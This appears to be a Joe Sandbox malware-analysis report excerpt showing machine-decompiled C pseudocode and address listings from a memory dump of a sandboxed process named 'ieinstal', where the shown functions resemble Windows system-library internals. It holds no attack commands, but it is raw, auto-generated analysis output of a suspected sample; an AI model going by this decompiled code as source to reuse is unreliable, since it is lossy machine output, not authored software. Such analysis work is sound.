							if(_t323 == 0xc0000100) {
								_t287 = _a4;
								__eflags = _t287;
								if(_t287 != 0) {
									_v36 = _t287;
									__eflags =  *_t287 - _t316;
									if( *_t287 == _t316) {
										_t323 = 0xc0000100;
										goto L76;
									} else {
										_t304 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t304 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t287;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t287) {
											__eflags =  *(_t304 + 0x1c);
											if( *(_t304 + 0x1c) == 0) {
												L106:
												_t323 = E1EC82AE4( &_v36, _a8, _t278, _a16, _a20, _a24);
												_v32 = _t323;
												__eflags = _t323 - 0xc0000100;
												if(_t323 != 0xc0000100) {
													goto L69;
												} else {
													_t316 = 1;
													_t287 = _v36;
													goto L75;
												}
											} else {
												_t250 = E1EC66600( *(_t304 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t287 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t323 = E1EC82C50(_t287, _a8, _t278, _a16, _a20, _a24, _t316);
											L76:
											_v32 = _t323;
											goto L69;
										}
									}
									goto L108;
								} else {
									E1EC6EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t323 = _a24;
									_t257 = E1EC82AE4( &_v36, _a8, _t278, _a16, _a20, _t323);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E1EC82C50(_v36, _a8, _t278, _a16, _a20, _t323, 1);
									}
									_v8 = _t316;
									E1EC82ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t323;
					}
					L70:
					return E1ECAD0D1(_t243);
				}
				L108:
			}


















































                                                            0x1ec82584
                                                            0x1ec82586
                                                            0x1ec82590
                                                            0x1ec82596
                                                            0x1ec82597
                                                            0x1ec82598
                                                            0x1ec82599
                                                            0x1ec8259e
                                                            0x1ec825a4
                                                            0x1ec825a9
                                                            0x1ec825ac
                                                            0x1ec825ae
                                                            0x1ec825b1
                                                            0x1ec825b2
                                                            0x1ec825b5
                                                            0x1ec825b8
                                                            0x1ec825bb
                                                            0x1ec825bc
                                                            0x1ec825bf
                                                            0x1ec825c2
                                                            0x1ec825c5
                                                            0x1ec825c6
                                                            0x1ec825cb
                                                            0x1ec825ce
                                                            0x1ec825d8
                                                            0x1ec825db
                                                            0x1ec825dd
                                                            0x1ec825de
                                                            0x1ec825e1
                                                            0x1ec825e3
                                                            0x1ec825e9
                                                            0x1ec826da
                                                            0x1ec826da
                                                            0x1ec826dd
                                                            0x1ec826e2
                                                            0x1ecc5b56
                                                            0x00000000
                                                            0x1ec826e8
                                                            0x1ec826f9
                                                            0x1ec826fb
                                                            0x1ec826fe
                                                            0x1ec82700
                                                            0x1ecc5b60
                                                            0x00000000
                                                            0x1ec82706
                                                            0x1ec82706
                                                            0x1ec8270a
                                                            0x1ec8270a
                                                            0x1ec8270d
                                                            0x1ec82713
                                                            0x1ec82716
                                                            0x1ec82718
                                                            0x1ec8271c
                                                            0x1ec8271e
                                                            0x1ecc5b6c
                                                            0x1ecc5b6f
                                                            0x1ecc5b7f
                                                            0x1ecc5b89
                                                            0x1ecc5b8e
                                                            0x1ecc5b93
                                                            0x1ecc5b96
                                                            0x1ecc5b9c
                                                            0x1ecc5ba0
                                                            0x1ecc5ba3
                                                            0x1ecc5bab
                                                            0x1ecc5bb0
                                                            0x1ecc5bb3
                                                            0x1ecc5bb3
                                                            0x1ecc5ba3
                                                            0x1ec82724
                                                            0x1ec82726
                                                            0x1ec82729
                                                            0x1ec8272c
                                                            0x1ec8279d
                                                            0x1ec8279d
                                                            0x1ec827a0
                                                            0x1ec827a2
                                                            0x00000000
                                                            0x1ec8272e
                                                            0x1ec8272e
                                                            0x1ec82731
                                                            0x1ec82734
                                                            0x1ec82734
                                                            0x1ec82736
                                                            0x1ecc5bc1
                                                            0x1ecc5bc1
                                                            0x1ecc5bc4
                                                            0x00000000
                                                            0x1ecc5bca
                                                            0x1ecc5bca
                                                            0x1ecc5bcd
                                                            0x00000000
                                                            0x1ecc5bd3
                                                            0x00000000
                                                            0x1ecc5bd3
                                                            0x1ecc5bcd
                                                            0x1ec8273c
                                                            0x1ec8273c
                                                            0x1ec82742
                                                            0x1ec82747
                                                            0x1ec8274a
                                                            0x1ec8274d
                                                            0x1ec82750
                                                            0x00000000
                                                            0x1ec82756
                                                            0x1ec82756
                                                            0x00000000
                                                            0x1ec82902
                                                            0x1ec82908
                                                            0x1ec8290b
                                                            0x00000000
                                                            0x1ec82911
                                                            0x1ec8291c
                                                            0x1ec82921
                                                            0x00000000
                                                            0x1ec82921
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82880
                                                            0x1ec82887
                                                            0x1ec8288c
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82805
                                                            0x1ec8280a
                                                            0x1ec82814
                                                            0x1ec82816
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8281e
                                                            0x1ec82821
                                                            0x1ec82823
                                                            0x00000000
                                                            0x1ec82829
                                                            0x1ec82829
                                                            0x1ec82831
                                                            0x1ec8283c
                                                            0x1ec8283e
                                                            0x00000000
                                                            0x1ec8283e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8284e
                                                            0x1ec82850
                                                            0x1ec82851
                                                            0x1ec82854
                                                            0x1ec82857
                                                            0x1ec8285a
                                                            0x1ec8285c
                                                            0x1ec8285d
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8275d
                                                            0x1ec82761
                                                            0x00000000
                                                            0x1ec82767
                                                            0x1ec8276e
                                                            0x1ec82773
                                                            0x1ec82773
                                                            0x1ec82776
                                                            0x1ec82778
                                                            0x1ec8277e
                                                            0x1ec8277e
                                                            0x1ec82781
                                                            0x1ec82781
                                                            0x1ec82783
                                                            0x1ec82784
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5bd8
                                                            0x1ecc5bde
                                                            0x1ecc5be4
                                                            0x1ecc5be6
                                                            0x1ecc5be8
                                                            0x1ecc5be9
                                                            0x1ecc5bee
                                                            0x1ecc5bf8
                                                            0x1ecc5bff
                                                            0x1ecc5c01
                                                            0x1ecc5c04
                                                            0x1ecc5c07
                                                            0x1ecc5c0b
                                                            0x1ecc5c0d
                                                            0x1ecc5c0d
                                                            0x1ecc5c15
                                                            0x1ecc5c18
                                                            0x1ecc5c1b
                                                            0x1ecc5c1b
                                                            0x1ecc5c1e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec828c3
                                                            0x1ec828c8
                                                            0x1ec828d2
                                                            0x1ec828d4
                                                            0x1ec828d8
                                                            0x1ec828db
                                                            0x1ecc5c26
                                                            0x1ecc5c28
                                                            0x1ecc5c2d
                                                            0x1ecc5c2d
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5c34
                                                            0x1ecc5c36
                                                            0x1ecc5c49
                                                            0x1ecc5c4e
                                                            0x1ecc5c54
                                                            0x1ecc5c5b
                                                            0x1ecc5c5d
                                                            0x1ecc5c60
                                                            0x1ec82788
                                                            0x1ec82788
                                                            0x1ec8278b
                                                            0x1ec8278e
                                                            0x1ec8278e
                                                            0x1ec8278e
                                                            0x1ec82791
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82756
                                                            0x1ec82750
                                                            0x00000000
                                                            0x1ec82794
                                                            0x1ec82794
                                                            0x1ec82795
                                                            0x1ec82798
                                                            0x1ec82798
                                                            0x00000000
                                                            0x1ec82734
                                                            0x1ec8272c
                                                            0x1ec82700
                                                            0x1ec825ef
                                                            0x1ec825ef
                                                            0x1ec825ef
                                                            0x1ec825f2
                                                            0x1ec825f8
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec825fe
                                                            0x00000000
                                                            0x1ec828e6
                                                            0x1ec828ec
                                                            0x1ec828ef
                                                            0x1ec828f5
                                                            0x1ec828f8
                                                            0x1ec828f8
                                                            0x00000000
                                                            0x1ec828f8
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82866
                                                            0x1ec82866
                                                            0x1ec82876
                                                            0x1ec82879
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec827e0
                                                            0x1ec827e7
                                                            0x1ec827e9
                                                            0x1ec827eb
                                                            0x1ecc5afd
                                                            0x00000000
                                                            0x1ecc5afd
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82633
                                                            0x1ec82638
                                                            0x1ec8263b
                                                            0x1ec8263c
                                                            0x1ec8263e
                                                            0x1ec82640
                                                            0x1ec82642
                                                            0x1ec82647
                                                            0x1ec82649
                                                            0x1ec8264e
                                                            0x1ec82650
                                                            0x1ec82653
                                                            0x1ec82659
                                                            0x1ec826a2
                                                            0x1ec826a7
                                                            0x1ec826ac
                                                            0x1ec826b2
                                                            0x1ecc5b11
                                                            0x1ecc5b15
                                                            0x1ecc5b17
                                                            0x00000000
                                                            0x1ec826b8
                                                            0x1ec826b8
                                                            0x1ec826ba
                                                            0x1ec827a6
                                                            0x1ec827a6
                                                            0x1ec827a9
                                                            0x1ec827ab
                                                            0x1ec827b9
                                                            0x1ec827b9
                                                            0x1ec827be
                                                            0x1ec827c1
                                                            0x1ec827c3
                                                            0x1ec827c5
                                                            0x1ec827c7
                                                            0x1ecc5c74
                                                            0x1ecc5c79
                                                            0x1ecc5c79
                                                            0x1ec827c7
                                                            0x00000000
                                                            0x1ec826c0
                                                            0x1ec826c0
                                                            0x1ec826c3
                                                            0x1ec826c6
                                                            0x1ec826c6
                                                            0x1ec826c9
                                                            0x1ec826c9
                                                            0x00000000
                                                            0x1ec826c9
                                                            0x1ec826ba
                                                            0x1ec8265b
                                                            0x1ec8265b
                                                            0x1ec8265e
                                                            0x1ec82667
                                                            0x1ec8266d
                                                            0x1ec82677
                                                            0x1ec8267c
                                                            0x1ec8267f
                                                            0x1ec82681
                                                            0x1ecc5b49
                                                            0x1ecc5b4e
                                                            0x1ec827cd
                                                            0x1ec827d0
                                                            0x1ec827d1
                                                            0x1ec827d2
                                                            0x1ec827d4
                                                            0x1ec827dd
                                                            0x1ec82687
                                                            0x1ec82687
                                                            0x1ec8268a
                                                            0x1ec8268b
                                                            0x1ec8268e
                                                            0x1ec8268f
                                                            0x1ec82691
                                                            0x1ec82696
                                                            0x1ec82698
                                                            0x1ec8269d
                                                            0x1ec8269f
                                                            0x00000000
                                                            0x1ec8269f
                                                            0x1ec82681
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82846
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82605
                                                            0x1ec8260a
                                                            0x1ec8260c
                                                            0x1ec82611
                                                            0x1ec82616
                                                            0x1ec82619
                                                            0x1ec82619
                                                            0x1ec8261e
                                                            0x00000000
                                                            0x1ec82624
                                                            0x1ec82627
                                                            0x1ec82627
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5b1f
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82894
                                                            0x1ec8289b
                                                            0x1ec8289d
                                                            0x1ec828a1
                                                            0x1ecc5b2b
                                                            0x1ecc5b2e
                                                            0x1ecc5b2e
                                                            0x1ec828a7
                                                            0x1ec828a9
                                                            0x1ecc5b04
                                                            0x1ecc5b09
                                                            0x1ecc5b09
                                                            0x1ecc5b09
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5b35
                                                            0x1ecc5b3c
                                                            0x1ec828fb
                                                            0x1ec828fb
                                                            0x1ec826cc
                                                            0x1ec826cc
                                                            0x1ec826d0
                                                            0x00000000
                                                            0x1ec826d2
                                                            0x1ec826d2
                                                            0x00000000
                                                            0x1ec826d2
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec825fe
                                                            0x1ec8292d
                                                            0x1ec8292f
                                                            0x1ec82930
                                                            0x1ec82935
                                                            0x1ec82937
                                                            0x1ec8293b
                                                            0x1ec8293f
                                                            0x1ec82943
                                                            0x1ec82947
                                                            0x1ec8294b
                                                            0x1ec8294f
                                                            0x1ec82950
                                                            0x1ec82951
                                                            0x1ec82954
                                                            0x1ec8295c
                                                            0x1ec8295d
                                                            0x1ec82960
                                                            0x1ec82963
                                                            0x1ec82967
                                                            0x1ec8296b
                                                            0x1ec8296f
                                                            0x1ec82973
                                                            0x1ec82974
                                                            0x1ec82977
                                                            0x1ec8297b
                                                            0x1ec8297c
                                                            0x1ec8297d
                                                            0x1ec8297e
                                                            0x1ec8297f
                                                            0x1ec82980
                                                            0x1ec82981
                                                            0x1ec82982
                                                            0x1ec82983
                                                            0x1ec82984
                                                            0x1ec82985
                                                            0x1ec82986
                                                            0x1ec82987
                                                            0x1ec82988
                                                            0x1ec82989
                                                            0x1ec8298a
                                                            0x1ec8298b
                                                            0x1ec8298c
                                                            0x1ec8298d
                                                            0x1ec8298e
                                                            0x1ec8298f
                                                            0x1ec82990
                                                            0x1ec82992
                                                            0x1ec82997
                                                            0x1ec829a3
                                                            0x1ec829a6
                                                            0x1ec829ab
                                                            0x1ec829ad
                                                            0x1ec829b0
                                                            0x1ec829b2
                                                            0x1ecc5c80
                                                            0x1ec829b8
                                                            0x1ec829b8
                                                            0x1ec829bb
                                                            0x1ec829c0
                                                            0x1ec829c5
                                                            0x1ec829c6
                                                            0x1ec829c6
                                                            0x1ec829c9
                                                            0x1ec829cb
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec829cd
                                                            0x1ec829d0
                                                            0x1ec829d9
                                                            0x1ec829db
                                                            0x1ec829dd
                                                            0x1ec82a7f
                                                            0x1ec82a84
                                                            0x1ec82a87
                                                            0x1ec82a89
                                                            0x1ecc5ca1
                                                            0x1ecc5ca3
                                                            0x00000000
                                                            0x1ec82a8f
                                                            0x1ec82a8f
                                                            0x00000000
                                                            0x1ec82a8f
                                                            0x00000000
                                                            0x1ec829e3
                                                            0x1ec829e3
                                                            0x1ec829e3
                                                            0x00000000
                                                            0x1ec829e3
                                                            0x1ec829dd
                                                            0x00000000
                                                            0x1ec829db
                                                            0x1ec829e6
                                                            0x1ec829e9
                                                            0x1ec829eb
                                                            0x1ec829ed
                                                            0x1ec829f3
                                                            0x1ec829f5
                                                            0x1ec829f8
                                                            0x1ec829fa
                                                            0x1ec82a97
                                                            0x1ec82a9a
                                                            0x1ec82a9d
                                                            0x1ec82add
                                                            0x00000000
                                                            0x1ec82a9f
                                                            0x1ec82aa2
                                                            0x1ec82aa5
                                                            0x1ec82aa8
                                                            0x1ec82aab
                                                            0x1ecc5cab
                                                            0x1ecc5caf
                                                            0x1ecc5cc5
                                                            0x1ecc5cda
                                                            0x1ecc5cdc
                                                            0x1ecc5cdf
                                                            0x1ecc5ce5
                                                            0x00000000
                                                            0x1ecc5ceb
                                                            0x1ecc5ced
                                                            0x1ecc5cee
                                                            0x00000000
                                                            0x1ecc5cee
                                                            0x1ecc5cb1
                                                            0x1ecc5cb4
                                                            0x1ecc5cb9
                                                            0x1ecc5cbb
                                                            0x00000000
                                                            0x1ecc5cbd
                                                            0x1ecc5cbd
                                                            0x00000000
                                                            0x1ecc5cbd
                                                            0x1ecc5cbb
                                                            0x1ec82ab1
                                                            0x1ec82ab1
                                                            0x1ec82ac4
                                                            0x1ec82ac6
                                                            0x1ec82ac6
                                                            0x00000000
                                                            0x1ec82ac6
                                                            0x1ec82aab
                                                            0x00000000
                                                            0x1ec82a00
                                                            0x1ec82a09
                                                            0x1ec82a0e
                                                            0x1ec82a21
                                                            0x1ec82a24
                                                            0x1ec82a35
                                                            0x1ec82a3a
                                                            0x1ec82a3d
                                                            0x1ec82a42
                                                            0x1ec82a59
                                                            0x1ec82a59
                                                            0x1ec82a5c
                                                            0x1ec82a5f
                                                            0x1ec82a5f
                                                            0x1ec829fa
                                                            0x1ec829f3
                                                            0x1ec82a64
                                                            0x1ec82a64
                                                            0x1ec82a6b
                                                            0x1ec82a6b
                                                            0x1ec82a6d
                                                            0x1ec82a72
                                                            0x1ec82a72
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PATH
                                                            • API String ID: 0-1036084923
                                                            • Opcode ID: 4d6b4c8162c6513d591fb3497a5f57d8b7cc39695ed4d3fd29c50e47bebf1845
                                                            • Instruction ID: 3737b51ba687b83d0932ac65153b0c651015f81e5ea129cae7d6f1ebf08a8913
                                                            • Opcode Fuzzy Hash: 4d6b4c8162c6513d591fb3497a5f57d8b7cc39695ed4d3fd29c50e47bebf1845
                                                            • Instruction Fuzzy Hash: 69C1BE75D00259EFCB18CF9ACD94EAEB7B2FF48B44F454629E841AB350DB34A941CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E1EC8FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E1EC6EEF0(0x1ed47b60);
					_t134 =  *0x1ed47b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1ed47b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1ed47b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E1EC66D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E1EC676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E1ECF8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E1EC5B150();
													}
													_t116 = E1ECF6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E1EC675CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1ed48638; // 0x2e60d08
																	_t122 = L1EC638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E1EC676E2(_t154);
																			goto L41;
																		}
																	} else {
																		E1EC676E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L1EC8FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L1EC670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E1EC8FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E1EC8FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E1EC8FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E1EC8FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E1EC8FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1ed47b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1ed47b84 = _t75;
						_t73 = E1EC6EB70(_t134, 0x1ed47b60);
						if( *0x1ed47b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E1EC6FF60( *0x1ed47b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                            0x1ec8fab0
                                                            0x1ec8fab2
                                                            0x1ec8fab3
                                                            0x1ec8fab4
                                                            0x1ec8fabc
                                                            0x1ec8fac0
                                                            0x1ec8fb14
                                                            0x1ec8fb17
                                                            0x1ec8fac2
                                                            0x1ec8fac8
                                                            0x1ec8facd
                                                            0x1ec8fad3
                                                            0x1ec8fad3
                                                            0x1ec8fadd
                                                            0x1ec8fb18
                                                            0x1ec8fb1b
                                                            0x1ec8fb1d
                                                            0x1ec8fb1e
                                                            0x1ec8fb1f
                                                            0x1ec8fb20
                                                            0x1ec8fb21
                                                            0x1ec8fb22
                                                            0x1ec8fb23
                                                            0x1ec8fb24
                                                            0x1ec8fb25
                                                            0x1ec8fb26
                                                            0x1ec8fb27
                                                            0x1ec8fb28
                                                            0x1ec8fb29
                                                            0x1ec8fb2a
                                                            0x1ec8fb2b
                                                            0x1ec8fb2c
                                                            0x1ec8fb2d
                                                            0x1ec8fb2e
                                                            0x1ec8fb2f
                                                            0x1ec8fb3a
                                                            0x1ec8fb3b
                                                            0x1ec8fb3e
                                                            0x1ec8fb41
                                                            0x1ec8fb44
                                                            0x1ec8fb47
                                                            0x1ec8fb4a
                                                            0x1ec8fb4d
                                                            0x1ec8fb53
                                                            0x1eccbdcb
                                                            0x1eccbdcb
                                                            0x1ec8fb59
                                                            0x1ec8fb5b
                                                            0x1ec8fb5b
                                                            0x1ec8fb5e
                                                            0x1eccbdd5
                                                            0x1eccbdd8
                                                            0x00000000
                                                            0x1eccbdda
                                                            0x00000000
                                                            0x1eccbdda
                                                            0x1ec8fb64
                                                            0x1ec8fb64
                                                            0x1ec8fb64
                                                            0x1ec8fb67
                                                            0x1ec8fb6e
                                                            0x1ec8fb70
                                                            0x1ec8fb72
                                                            0x00000000
                                                            0x1ec8fb78
                                                            0x1ec8fb7a
                                                            0x1ec8fb7a
                                                            0x1ec8fb7d
                                                            0x1ec8fb80
                                                            0x1eccbddf
                                                            0x1eccbde1
                                                            0x00000000
                                                            0x1eccbde3
                                                            0x00000000
                                                            0x1eccbde3
                                                            0x1ec8fb86
                                                            0x1ec8fb86
                                                            0x1ec8fb86
                                                            0x1ec8fb8b
                                                            0x1ec8fb90
                                                            0x1ec8fb92
                                                            0x1ec8fb94
                                                            0x1ec8fb9a
                                                            0x1ec8fb9b
                                                            0x1ec8fba1
                                                            0x1eccbde8
                                                            0x1eccbdeb
                                                            0x1eccbded
                                                            0x1eccbeb5
                                                            0x1eccbeb5
                                                            0x1eccbebb
                                                            0x1eccbebd
                                                            0x1eccbec3
                                                            0x1eccbed2
                                                            0x1eccbedd
                                                            0x1eccbedd
                                                            0x1eccbeed
                                                            0x00000000
                                                            0x1eccbdf3
                                                            0x1eccbdfe
                                                            0x1eccbe06
                                                            0x1eccbe0b
                                                            0x1eccbe0d
                                                            0x1eccbe0f
                                                            0x1eccbe14
                                                            0x1eccbe19
                                                            0x1eccbe20
                                                            0x1eccbe25
                                                            0x1eccbe27
